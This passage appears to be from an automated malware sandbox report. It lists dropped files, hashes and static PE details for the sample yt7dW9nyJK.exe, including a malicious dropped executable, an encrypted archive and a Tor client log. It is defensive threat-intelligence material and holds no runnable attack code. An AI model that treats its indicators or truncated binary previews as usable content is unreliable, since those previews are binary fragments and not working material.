                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hckj2gxm.rnb.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i1mvds3v.v0w.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_l0101xle.s0i.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lzwpiuff.jmv.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_m3z3ak3j.32l.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_me1qx4rb.hmp.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mvzsxaxf.dyh.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mw1hfszi.jap.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nrbnls0v.d4f.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_oobpaqwn.zug.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_othxcp55.tz1.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_owckkmfr.2im.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pfkd13xr.iph.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qjkk3gez.ban.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rro0gacx.wcr.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uh5byygc.xcj.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vbqj0aob.upn.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vcj25nk1.nzq.psm1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y24pgiam.yva.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y2dz5e41.4xu.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yhcdduuo.nrr.ps1

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          File Type:ASCII text, with no line terminators
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.038920595031593
                                                                          Encrypted:false
                                                                          SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                          MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                          SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                          SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                          SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                          C:\Users\user\AppData\Local\Temp\ffmaba.exe

                                                                          Download File
                                                                          Process:C:\Users\user\Desktop\yt7dW9nyJK.exe
                                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Category:dropped
                                                                          Size (bytes):511496
                                                                          Entropy (8bit):7.963050096245282
                                                                          Encrypted:false
                                                                          SSDEEP:12288:JSoFwZbQp5MKHYRAnRx8S18Bjbgot1C2kR:coFzaeJX8Rt1O
                                                                          MD5:4FAAFBF754FC2DAD8769BA54C564C22F
                                                                          SHA1:314B707CE3A9043E2C219B6F1DE883C572089EA8
                                                                          SHA-256:459C1822B23497D81044D18CE0936F876B37A478CE847140EC69A8DD58C0A1E8
                                                                          SHA-512:F487E7EEE98B3B97E43C7C9759BC50D2341AB5622AF80ED4A06ED32FEE9A221BA1E968E95213B2B44FB5D72B1AF618B7B1BA0A77BE81CB2A65FF99979D7C2ED1
                                                                          Malicious:true
                                                                          Antivirus:
                                                                          • Antivirus: ReversingLabs, Detection: 46%
                                                                          Reputation:unknown
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....f..............0..|.............. ........@.. ....................................@.................................t...O........................6........................................................... ............... ..H............text....x... ...|.................. ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                          C:\Users\user\AppData\Local\Temp\tmpCBEE.tmp

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\Starlabs\ffmaba.exe
                                                                          File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                          Category:dropped
                                                                          Size (bytes):6710958
                                                                          Entropy (8bit):7.998536518881409
                                                                          Encrypted:true
                                                                          SSDEEP:98304:bOpzhgWh6LHZbUoR3eO+pZBq1OkrWo+oodFbQVWnrb3WQ4bW3U7yyf3xqq2/pB/u:Kpzp6/t09yNKFmurnz3fgRk57MV
                                                                          MD5:F4E79137AB4B7C0AF7F410F87561BF23
                                                                          SHA1:9412D1C5CE21F407EDE88144C45E098216271DB8
                                                                          SHA-256:044940B15C5DD4EB47C58BBD1F58F81B431CE82B6501F8744C9AE3EFB26C7AE7
                                                                          SHA-512:B1487FF19CC0261DD2C66CD57B0B16AC7DB9A0C2F4F50956B82AD84B5420A9A77AE2B126F6D39CE1731E0055D1F77EACD7C5EA2022E7F2620BB2E9CD4030EC4E
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:PK........@..S,...............libssl-1_1.dll...t.U.8.w.t...z...f%h..D.h...IH"D....TTD.YE...,.z&.m...._.......<..."..`....(.W....vO.$..~....}.|.C...n.u...{....S.......a.@.....W........z...W......2....3.}......;.3.y.m.3.wdN.#.d...?.9..z...:*..B.x2.l.-\u. ..R....g.=S..L. ..a.),...g.oB.4|v.."...M.#.,...'.~....T..x........N...j.`...a...N........{u.!....;z...8q..........R. .kjb..B...&....=.rx./..$f,.&6^0.2f..Q..3...]..^p..w..^.......n....$\.E....I...^0...\A.D.Y.%_....V.3tC.p.....F.\.'.....|3.y. ...vu...;o.h..X.%.ww.|E...s......r%.+,.....'.....L.....St..>|..2....p>..pw.w.>.....4.B...2|~..............s;..\o...zw./..+z.............e.}h`.w.'......?uOF...3b..J...!.%..9..Y........%..n.....Y...c..D_.-..~k.G.Ye..B...W.i..I..'....b..V.....C_S....X..t5T.n....f...hP;D9.w.4.y`....W.'....G.....9....vhs.k...&k.K.N.(...6.-.(..%.B<.]..;.._=WC.@.^.d..(.0!.Jq..L....=n5..-2..r..!.ur....Cnk....Z..a.hZ,.3Q>KX......i..u....x..^..`.P.%."Ds..$....F.K.....V>>.yP...8

                                                                          \Device\ConDrv

                                                                          Download File
                                                                          Process:C:\Users\user\AppData\Local\77rh3rhsc7\tor\tor-real.exe
                                                                          File Type:ASCII text, with very long lines (307), with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):4090
                                                                          Entropy (8bit):5.1101770060159515
                                                                          Encrypted:false
                                                                          SSDEEP:96:xXx46ioKoQ15S/5cqXhNol2z75gc/5WoKW+B:xy6H/Q15S/5DxOl2yaaB
                                                                          MD5:674FE6AD8B3B1D418EDE68F38DDBE4F5
                                                                          SHA1:5FE450FD580AF12E714A01215A22A989C591DA5A
                                                                          SHA-256:797C312D226D3C0FE766428CE4F982CBA6E9C738D6616890913C7DF0998D048D
                                                                          SHA-512:BC460645DCF9FC3E7CAAC8DE86387930876C55EEAEA8307827A8BB2EDD8ACF873E43D3DBE8492B89766B26C7FFE9860E9EACD11F4751D8BEE109561364E7FEDD
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:Jul 23 09:47:08.844 [notice] Tor 0.4.5.10 (git-fd74f7628eba2525) running on Windows 8 [or later] with Libevent 2.1.12-stable, OpenSSL 1.1.1l, Zlib 1.2.11, Liblzma N/A, Libzstd N/A and Unknown N/A as libc...Jul 23 09:47:08.844 [notice] Tor can't help you if you use it wrong! Learn how to be safe at https://www.torproject.org/download/download#warning..Jul 23 09:47:08.876 [notice] Read configuration file "C:\Users\user\AppData\Local\77rh3rhsc7\tor\torrc.txt"...Jul 23 09:47:08.876 [warn] Path for GeoIPFile (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jul 23 09:47:08.876 [warn] Path for GeoIPv6File (<default>) is relative and will resolve to C:\Users\user\Desktop\<default>. Is this what you wanted?..Jul 23 09:47:08.876 [warn] ControlPort is open, but no authentication method has been configured. This means that any program on your computer can reconfigure your Tor. That's bad! You should upgrade your Tor controller as soon

                                                                          \Device\Null

                                                                          Download File
                                                                          Process:C:\Windows\SysWOW64\timeout.exe
                                                                          File Type:ASCII text, with CRLF line terminators, with overstriking
                                                                          Category:dropped
                                                                          Size (bytes):60
                                                                          Entropy (8bit):4.41440934524794
                                                                          Encrypted:false
                                                                          SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                                                          MD5:3DD7DD37C304E70A7316FE43B69F421F
                                                                          SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                                                          SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                                                          SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                                                          Malicious:false
                                                                          Reputation:unknown
                                                                          Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..

                                                                          Static File Info

                                                                          General

                                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                          Entropy (8bit):7.9600079887410775
                                                                          TrID:
                                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.98%
                                                                          • Win32 Executable (generic) a (10002005/4) 49.93%
                                                                          • Windows Screen Saver (13104/52) 0.07%
                                                                          • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                                          File name:yt7dW9nyJK.exe
                                                                          File size:465'416 bytes
                                                                          MD5:adbe420a49db30f75d4665ea0014af43
                                                                          SHA1:ed38f3bf9c5e56110cdf8c686bffee54128c51d6
                                                                          SHA256:b851e1ad3f4882815c89fa7754ed5dc89edfc0c2ea873a83a19f65299566e46d
                                                                          SHA512:a3ef38d66cebb762e5399c02b452773f6b8fc6290aacac4487f1ab4984665657ce9f56716ac83ca4f72d1a6d20e9899cd8d642d65664eeb4e0ede9891d9dfc17
                                                                          SSDEEP:12288:+jABvvWcHtP2EFK4U0ZPo4Y8Vv9IKBa8Zhp3BXkR:tXoh47Pj3l97Ha
                                                                          TLSH:27A412D3E174851BC751A5B12CFB44824B721223DB59D9AC3CDC02AFACC6B90A711BDB
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...0..f..............0.................. ........@.. .......................@............@................................

                                                                          File Icon

                                                                          Icon Hash:3bb2b38d9df9e99b

                                                                          Static PE Info

                                                                          General

                                                                          Entrypoint:0x46e58a
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:true
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
